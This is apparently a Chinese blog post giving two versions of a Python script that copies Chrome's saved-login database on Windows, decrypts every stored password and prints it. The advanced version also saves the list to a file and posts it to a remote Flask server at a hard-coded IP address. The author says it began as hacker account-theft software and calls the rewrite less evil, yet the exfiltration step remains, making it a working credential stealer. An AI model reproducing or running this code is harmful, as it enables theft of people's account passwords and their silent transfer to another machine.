使用谷歌浏览器都知道,非常人性化的一方面就是记住我们在某些网站登录的账号和密码,并且自动填写,那么我们将利用py获取谷歌浏览器上保存的所有账号和密码,对于此程序原身为黑客盗号软件,经过我的改写,它将不会这么邪恶。
简易版代码
# -*- coding: utf-8 -*-
# Software : IDLE
# version:Python 3.6.6
import os
import shutil
import sqlite3
import win32crypt
db_file_path = os.path.join(os.environ['LOCALAPPDATA'], r'Google\Chrome\User Data\Default\Login Data')
tmp_file = os.path.join(os.environ['LOCALAPPDATA'], 'sqlite_file')
print(tmp_file)
if os.path.exists(tmp_file):
os.remove(tmp_file)
shutil.copyfile(db_file_path, tmp_file)
conn = sqlite3.connect(tmp_file)
for row in conn.execute('select signon_realm,username_value,password_value from logins'):
ret = win32crypt.CryptUnprotectData(row[2], None, None, None, 0)
print('网站:%-50s,用户名:%-20s,密码:%s' % (row[0][:50], row[1], ret[1].decode('gbk')))
conn.close()
os.remove(tmp_file)
完整进阶版代码
# -*- coding: utf-8 -*-
# Software : IDLE
# version:Python 3.6.6
import os
import shutil
import sqlite3
import win32crypt
import json
import requests
APP_DATA_PATH = os.environ["LOCALAPPDATA"]
DB_PATH = r'Google\Chrome\User Data\Default\Login Data'
class ChromePassword:
def __init__(self):
self.passwordsList = []
def get_chrome_db(self):
_full_path = os.path.join(APP_DATA_PATH, DB_PATH)
_tmp_file = os.path.join(os.environ['LOCALAPPDATA'], 'sqlite_file')
if os.path.exists(_tmp_file):
os.remove(_tmp_file)
shutil.copyfile(_full_path, _tmp_file)
self.show_passwords(_tmp_file)
def show_passwords(self, db_file):
conn = sqlite3.connect(db_file)
_sql = '''select signon_realm,username_value,password_value from logins'''
for row in conn.execute(_sql):
ret = win32crypt.CryptUnprotectData(row[2], None, None, None, 0)
# 密码解析后得到的是字节码,需要进行解码操作
_info = 'url: %-40s username: %-20s password: %s\n' % \
(row[0][:50], row[1], ret[1].decode())
self.passwordsList.append(_info)
conn.close()
os.remove(db_file)
def save_passwords(self):
with open('password.txt', 'w', encoding='utf-8') as f:
f.writelines(self.passwordsList)
def transfer_passwords(self):
try:
# 此处填写远端Flask对应的IP:PORT
requests.post('http://192.168.1.102:9999/index',
data=json.dumps(self.passwordsList))
except requests.exceptions.ConnectionError:
pass
if __name__ == '__main__':
Main = ChromePassword()
Main.get_chrome_db()
Main.save_passwords()
Main.transfer_passwords()
运行显示
![MexQwd.png](https://i-blog.csdnimg.cn/blog_migrate/9d092eb6aa1e236f3452214dbb00dbc3.png)